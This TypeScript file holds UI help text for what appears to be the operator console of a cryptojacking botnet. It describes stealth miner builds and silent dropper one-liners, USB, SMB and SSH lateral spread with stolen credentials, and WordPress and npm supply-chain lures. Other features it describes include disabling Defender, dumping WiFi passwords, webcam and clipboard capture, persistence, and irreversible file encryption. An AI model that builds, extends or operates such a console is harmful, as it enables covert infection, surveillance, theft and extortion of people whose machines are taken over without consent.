Some checks failed
CI Docker Mining Proof / Linux agent hashrate proof (push) Has been cancelled
241 lines
18 KiB
TypeScript
241 lines
18 KiB
TypeScript
/** Inline help for dashboard, crucible, fleet, build manager, and other operator UI — not forge/calibrate form fields. */
|
||
export const UI_HELP: Record<string, string> = {
|
||
dash_fleet_health:
|
||
'Composite score from online ratio, accept rate, and hashrate activity. Green means the fleet is mining normally; amber or red flags nodes to check on Crucible.',
|
||
dash_install_funnel:
|
||
'Shows how many agents connected in the last 7 days, grouped by forged build. USB column counts agents that arrived via USB spread.',
|
||
dash_operator_audit:
|
||
'Server-side log of operator actions (logins, forge, remote commands). Last 50 entries; refreshes every minute.',
|
||
dash_signal_locked:
|
||
'Live WebSocket link to the control server. When reconnecting, fleet stats may be stale until the signal locks again.',
|
||
dash_advanced_mode:
|
||
'Overview hides extra charts, topology, pool status, and the raw matrix stream. Advanced shows the full telemetry deck.',
|
||
dash_raw_stream:
|
||
'Full-screen scrolling dump of live WebSocket traffic — useful for debugging agent messages, not day-to-day monitoring.',
|
||
dash_fleet_hash:
|
||
'Sum of 15-minute average hashrate across all online Monero (RandomX) miners in the fleet.',
|
||
dash_est_daily:
|
||
'Rough USD/day from live fleet hashrate and the cached XMR price. Connect a wallet on Calibrate for pool-reported earnings instead.',
|
||
dash_accept_rate:
|
||
'Percentage of submitted shares accepted by the pool. Below ~95% often means bad pool connectivity or misconfigured workers.',
|
||
dash_nodes_live:
|
||
'Online agents with an active WebSocket heartbeat versus total registered agents (including offline).',
|
||
dash_fleet_pipeline:
|
||
'Setup checklist: forged build exists → agent deployed → node online → hashrate flowing → shares reaching the pool.',
|
||
dash_pool_stratum:
|
||
'Upstream pool connections from this control server. LIVE = stratum connected; DEGRADED or DOWN means payout risk.',
|
||
dash_ai_activity:
|
||
'Agents with AI Autonomy enabled ask Ollama on this PC for self-healing decisions. Empty until a forged miner reports in.',
|
||
dash_gpu_rvn:
|
||
'Ravencoin KawPoW GPU miners detected on online agents. Separate from Monero CPU hashrate above.',
|
||
dash_xmr_section:
|
||
'Monero RandomX CPU mining stats for the fleet. GPU Ravencoin rigs appear in the RVN section below when active.',
|
||
|
||
crucible_node_roster:
|
||
'Every registered agent. Click to select; badges show SSH reachability, security posture, patches, and resource pressure.',
|
||
crucible_heat_map:
|
||
'Spatial view of node selection and group colors. Click a dot to toggle that agent in the roster.',
|
||
crucible_groups:
|
||
'Named color groups for the fleet. Click a group chip to select all members for bulk commands.',
|
||
crucible_active_target:
|
||
'The focused node when exactly one is selected — used for single-agent panels like live desktop and file browser.',
|
||
crucible_access_depth:
|
||
'Host posture, LOTL mining tier status, join lane, and effective onion order for the selected agent — from live WS stats plus mining_diagnostics when run.',
|
||
crucible_access_depth_calibrate:
|
||
'Calibrate → lotl_onion_tiers changes spread contingency order on next agent reconnect (agents forged with lotl_policy_from_server).',
|
||
crucible_tab_ops:
|
||
'Day-to-day remote control: pause/resume mining, shell commands, agent restart, logs, and power actions.',
|
||
crucible_tab_recon:
|
||
'Intelligence gathering: posture scans, full system audit, screenshots, camera list, and network discovery.',
|
||
crucible_tab_files:
|
||
'Browse, upload, download, and encrypt files on the selected online agent via the remote file browser.',
|
||
crucible_tab_spread:
|
||
'Lateral movement and propagation: spread-now, SMB shares, credential vault, and secure wipe.',
|
||
crucible_tab_tunnels:
|
||
'SSH port forwards and protocol tunnels between your control PC and selected agents.',
|
||
crucible_mining_ops:
|
||
'Fleet health power management: pause or resume hashing on selected online nodes. Mining telemetry egresses on the agent WebSocket (same port as heartbeat) — the agent process stays connected.',
|
||
crucible_resume:
|
||
'Fleet health job: restore hashing workload after a pause or idle throttle.',
|
||
crucible_pause:
|
||
'Fleet health job: power down hashing on selected nodes without stopping the agent — they stay connected on WSS.',
|
||
crucible_full_audit:
|
||
'Deep posture scan (30–60s): firewall, WAN IP, geo, DNS, ARP, subnet scan, hardware, and listeners.',
|
||
crucible_posture_badge:
|
||
'Quick security summary from the last heartbeat: AV, firewall, SSH, elevation, and patch state.',
|
||
crucible_vpc_seeder:
|
||
'AWS EC2 agents report vpc-id from IMDS. Fleet Torrent elects one VPC seeder per vpc-id; badge shows VPC seeder (primary) or VPC leecher (secondary seeder in same VPC).',
|
||
crucible_master_terminal:
|
||
'Command output and errors from bulk ops stream here. Green lines succeeded; red lines failed.',
|
||
crucible_section_agent:
|
||
'Restart, fetch logs, kill, or fully uninstall the agent process on selected nodes.',
|
||
crucible_section_system:
|
||
'OS-level power actions — reboot or shutdown the whole machine, not just the miner.',
|
||
crucible_section_persistence:
|
||
'BITS jobs, host-binary hijack, and read-only persistence audits for surviving reboots.',
|
||
crucible_section_maintenance:
|
||
'Fleet upgrades, wake-on-LAN, registry read/write, and remote process kill by PID.',
|
||
crucible_section_intel:
|
||
'One-click intel pulls: screenshot, processes, netstat, clipboard, WiFi creds, and more.',
|
||
crucible_section_security:
|
||
'Post-exploit posture changes — disable Defender or dump saved WiFi passwords.',
|
||
crucible_section_network:
|
||
'Connectivity probes, listener tables, patch status, ARP neighbors, and firewall controls.',
|
||
crucible_section_media:
|
||
'Live desktop polling, camera enumeration, and per-device webcam snapshots.',
|
||
crucible_section_files_quick:
|
||
'Push files to Desktop or a custom path, or pull a remote file into the terminal.',
|
||
crucible_section_files_advanced:
|
||
'Delete, move, or secure-wipe paths on selected agents — confirm before destructive ops.',
|
||
crucible_section_destructive:
|
||
'SYS CRYPT encrypts Documents/home — irreversible without the key.',
|
||
crucible_section_spread:
|
||
'On-demand lateral spread, subnet discovery, SMB shares, credential vault names, and Probe & Join (discover_and_join).',
|
||
crucible_section_cred_graph:
|
||
'Read-only credential affinity edges per /24 subnet — success/fail counts from authorized spread runs (no secrets).',
|
||
crucible_section_service_graph:
|
||
'Enumerated services and join-lane candidates for the selected agent subnet (from discover_and_join / service probe).',
|
||
crucible_section_seek:
|
||
'SUPP Seek recursively seeds media folders with silent launcher stubs (Windows + Mac/Linux).',
|
||
crucible_section_ssh:
|
||
'Probe or wake OpenSSH on Windows nodes, plus a quick reference for direct and tunneled SSH.',
|
||
crucible_section_tunnels:
|
||
'WAN IP, UPnP hole punch, Cloudflare outbound tunnels, mesh peers, and tunnel stop.',
|
||
crucible_section_protocol_tunnel:
|
||
'Full protocol tunnel panel for the focused node — cloudflared, SSH forwards, and live status.',
|
||
crucible_section_portfwd:
|
||
'Matrix of SSH local-forward rules pushed to selected Windows agents.',
|
||
crucible_section_spread_templates:
|
||
'Generate and download custom script templates for lateral movement, registry auto-run persistence, or custom payloads with baked-in server configuration.',
|
||
|
||
bm_pin_dropper:
|
||
'Pinned build is served by unauthenticated dropper URLs (install.ps1 / install.sh). Only one build can be pinned at a time.',
|
||
bm_public_build:
|
||
'Public builds appear on the login page download list without signing in — useful for LAN handoffs.',
|
||
bm_dropper_oneliner:
|
||
'One-liner scripts download and silently install the pinned build (or latest if none pinned) from this server.',
|
||
bm_reforge:
|
||
'Open Forge with this build\'s settings pre-filled so you can tweak and compile a new revision.',
|
||
bm_platform_badge:
|
||
'Target OS baked into the installer: Windows, Linux, macOS, or Universal (multi-OS ZIP).',
|
||
|
||
fm_remote_browse:
|
||
'Live directory listing on the selected agent. Double-click folders to navigate; select files to download or preview text.',
|
||
fm_upload:
|
||
'Push a file from your browser to the agent. Set destination path or defaults to current folder + filename.',
|
||
fm_encrypt_path:
|
||
'AES-256-GCM encrypt every file at the current path. Irreversible without the key — requires Remote Aggressive Ops.',
|
||
|
||
pt_path_tracer:
|
||
'On-demand multi-hop WireGuard VPN through up to 3 Windows agents. Scan the QR or import the .conf on your phone.',
|
||
pt_agent_chain:
|
||
'Pick agents in order — traffic hops through each node. Windows only; max 3 hops. Click TRACE to orchestrate tunnels.',
|
||
pt_onion_timeline:
|
||
'Fork-merge onion timeline for Path Tracer chains — ghost branches per hop, merge winning strains, and skip hospice-retired spread lanes when picking merge parents.',
|
||
|
||
fleet_runtime_policy:
|
||
'Push live mining policy (schedule, CPU cap, optional pool override) to online agents without re-forging.',
|
||
fleet_runtime_modules:
|
||
'Hot-load optional agent modules (e.g. crucible ops pack) onto connected workers.',
|
||
|
||
spread_funnel_widget:
|
||
'Campaign install funnel: page hits → downloads → first beacon → mining, per ?c= slug. See Emberwake for full war room.',
|
||
|
||
md_overview:
|
||
'Fast path to a forged agent: pick Ghost, Loud, or Spread, optionally layer a spread profile, then one click builds and exports a kit when needed. Copy install commands from Builds; track campaigns in Emberwake; use Forge when you need every option.',
|
||
md_operation_chip:
|
||
'Ghost = stealth worker for quiet LAN installs. Loud = visible logs for lab testing. Spread = universal kit with USB/LAN autospread — pair with a spread profile on the right.',
|
||
md_spread_profile:
|
||
'Optional deliverable shape on top of your operation chip — e.g. LAN Kindling adds SMB/SSH spread flags, Desktop Fusion enables media fusion packaging.',
|
||
md_campaign_identity:
|
||
'Campaign slug tags every link with ?c= so Emberwake can group hits and beacons. Worker name, control URL, and wallet are the only identity fields you need here.',
|
||
md_strike_pipeline:
|
||
'One automated run: lock presets → compile the agent → export spread-kit ZIP when the loadout requires it. Install commands live on Builds after the run finishes.',
|
||
md_equip_strike:
|
||
'Starts the pipeline using your equipped loadout. Fix wallet or control URL errors before clicking; grab install one-liners from Builds when done.',
|
||
md_loadout_preview:
|
||
'Live summary of your equipped preset: operation chip, spread profile, campaign slug, worker name, and deliverable shape. Preflight runs before Equip & Strike — fix wallet or endpoint errors shown below the button.',
|
||
md_campaign_slug:
|
||
'Short tag appended as ?c= on install links. Emberwake War Room groups hits, downloads, beacons, and hashrate by this slug — set it before forging so telemetry lands in the right campaign.',
|
||
md_preflight:
|
||
'Wallet, control URL, and worker name must pass validation before Equip & Strike unlocks. Spread Kit export is skipped automatically when your loadout ships a single-platform or fusion deliverable instead.',
|
||
|
||
subnet_immune_autopsy:
|
||
'Auto-built when a /24 hits five spread failures: last LOTL attempts, WSUS mimic, persona, erasure fallback, atlas gossip whispers, cause-of-death, and BGP vaccination lane from the spread router.',
|
||
pt_subnet_autopsy:
|
||
'Immune autopsy for spread-target /24 prefixes paused by subnet_spread_pause — shows vaccination route hints beside Path Tracer spread routes.',
|
||
ew_overview:
|
||
'Spread desk after you forge: tag install links with ?c=, export lure kits, and read campaign funnels. Forge agents on Mission Deck (fast) or Forge (full control).',
|
||
ew_campaign_setup:
|
||
'Shared settings for every Emberwake export on this page. Campaign slug tags telemetry; pinned build selects which forged agent gets installed.',
|
||
ew_campaign_slug:
|
||
'Short name appended as ?c= on dropper and download URLs. War Room groups hits, downloads, beacons, and hashrate by this slug.',
|
||
ew_install_links:
|
||
'Per-platform install one-liners live in Builds. Pin a build there, then copy PowerShell / bash / download URLs for remote deploy.',
|
||
ew_spread_kit:
|
||
'Downloads a ZIP of spread-kit templates (README, Deploy scripts, lander assets) with your server URL and campaign slug baked in.',
|
||
ew_war_room:
|
||
'Live funnel per campaign: page hits → downloads → first agent beacon → mining nodes and fleet hashrate. Updates every 15s and on WebSocket push.',
|
||
ew_supply_chain:
|
||
'Advanced: export a WordPress plugin ZIP or npm package template that pulls your dropper on install. Uses campaign settings above.',
|
||
ew_public_urls:
|
||
'Direct /api/v1/public/download links for each build — same files shown on the login page when a build is marked public.',
|
||
ew_techniques:
|
||
'Index of spread vectors with links into the tabbed Spread Techniques playbook. Emberwake handles actions; the playbook has step-by-step how-to.',
|
||
ew_shared_notes:
|
||
'Collaborative scratchpad synced to every logged-in operator. Use for lure copy, host paths, or rotation notes — not stored on agents.',
|
||
ew_war_room_funnel:
|
||
'Shows hits → downloads → first beacon → mining counts per ?c= slug for the selected window. Each column is a funnel stage; a large drop at any step points to where the install chain is breaking.',
|
||
ew_war_room_views:
|
||
'Switch between Funnel board (per-stage campaign breakdown), Stats table (full numbers with sparklines), and Constellations (visual map of campaign activity). All three draw from the same rolling window.',
|
||
ew_war_room_funnel_board:
|
||
'Per-campaign funnel cards: hits → downloads → first beacon → mining → hashrate with stage conversion rates and 7-day hit sparklines. Compare to Command Deck Install Funnel (build-centric) — War Room is campaign-slug centric via ?c=.',
|
||
ew_war_room_stats_table:
|
||
'Tabular War Room view with odometer counts, conversion %, online agents, and daily hit sparklines per campaign slug. Same data as the funnel board — use when you need sortable numbers across many campaigns.',
|
||
ew_war_room_constellations:
|
||
'Force-directed map: node size = hits, brightness = online agents, color = conversion %, edges = shared pin/build. Click a star to highlight its funnel card below.',
|
||
ew_war_room_leak:
|
||
'Automated funnel leak hints when a stage drops sharply (e.g. downloads but no beacons). LEAK = critical drop; Drip = minor — follow the suggested action on each card.',
|
||
ew_cloud_aws:
|
||
'AWS spread kits: S3+CloudFront erasure shards, SSM documents, Launch Templates, Fargate burst, EventBridge fan-out, and Cloud Map snippets. Connection test is HTTP reachability only — operator applies templates in their AWS account.',
|
||
ew_cloud_generic:
|
||
'Vendor-neutral cloud kits: MinIO S3-compatible staging and curl-manifest shard lists. Point bucket/endpoint fields at your operator-owned origin.',
|
||
ew_crucible_recon_link:
|
||
'Cross-link to Crucible with ?reconHost= — opens the spread tab, loads GET /api/v1/recon/deploy-kit, and shows spread-to-unreachable-host when no fleet agent matches the IP.',
|
||
|
||
crucible_recon_host:
|
||
'Query param ?reconHost= pre-filters the roster to matching IP/hostname and opens Spread ops. When the host has no online agent, use manual IP target + Spread to host (POST /api/v1/fleet/spread-to-host).',
|
||
|
||
crucible_btn_spread_now:
|
||
'Triggers the lateral movement sweep immediately on selected nodes — tries discovered LAN IPs from ARP, SMB, and subnet scan results. Requires Remote Aggressive Ops capability; a prior subnet scan or ARP run gives it more targets.',
|
||
crucible_btn_subnet_scan:
|
||
'Probes the local /24 for live hosts via ICMP and TCP knock and returns a host list. Feeds Spread Now and SSH probe. Can take 10–40 s on congested or slow subnets.',
|
||
crucible_btn_hole_punch:
|
||
'Asks the LAN router to create a UPnP inbound port mapping (default 8989) so the agent is reachable from WAN without a VPN or port-forward rule. Requires a router with UPnP enabled.',
|
||
crucible_btn_cf_tunnel:
|
||
'Launches a cloudflared outbound tunnel to the optional target URL (or the server default tunnel URL). Agent dials out — no inbound firewall rule or open port needed on the target machine.',
|
||
|
||
fl_filter_chips:
|
||
'Narrow the roster by name/IP/notes/tags (text search), tag label, subnet prefix, minimum 15m hashrate, or the "needs attention" flag (offline or idle miners below 100 H/s).',
|
||
fl_bulk_actions:
|
||
'Actions applied to every checked agent at once: pause or resume mining, stop the miner thread, restart only idle workers, take a screenshot (one agent only), or permanently delete from roster.',
|
||
fl_groups:
|
||
'Named color-coded subsets of the fleet stored in browser local storage. Click a chip to check-select all members — then apply bulk actions or send Crucible commands to the whole group at once.',
|
||
|
||
set_alerts:
|
||
'Dashboard thresholds that trigger amber or red status badges: how long before an agent is marked offline, how far hashrate must drop to flag a node, and at what rejection-rate share quality degrades.',
|
||
set_alert_notifications:
|
||
'Push fleet events to Telegram, a custom webhook endpoint, or email (SMTP). Fill bot token + chat ID or webhook URL, choose which events to forward, save Calibration, then send a test message to confirm delivery.',
|
||
set_webhook:
|
||
'HTTP POST endpoint that receives JSON for every enabled fleet event: { event, title, message }. Use for Slack incoming webhooks, n8n automation, custom dashboards, or any HTTP trigger.',
|
||
ui_color_scheme:
|
||
'AetherForge is steampunk dark-first. When your OS uses light mode, panels soften slightly via prefers-color-scheme — neon brass/cyan tokens stay the same. No separate theme toggle yet.',
|
||
|
||
dr_overview:
|
||
'Owned-target browser deploy recon from the control server: TCP port matrix, shallow web crawl for upload/SSRF/CMS hints, and copy-paste curl install.sh + SSRF probe URLs pinned to your session build.',
|
||
dr_port_matrix:
|
||
'Green cells are open TCP ports on the target from this server. Click an open port for the spread lane hint (WinRM, SMB, curl drop, SSH LOTL).',
|
||
dr_path_prefix:
|
||
'Optional URL path prefix for the web crawl seed (e.g. /admin). Port field sets the HTTP(S) service port; HTTPS toggle sets scheme.',
|
||
};
|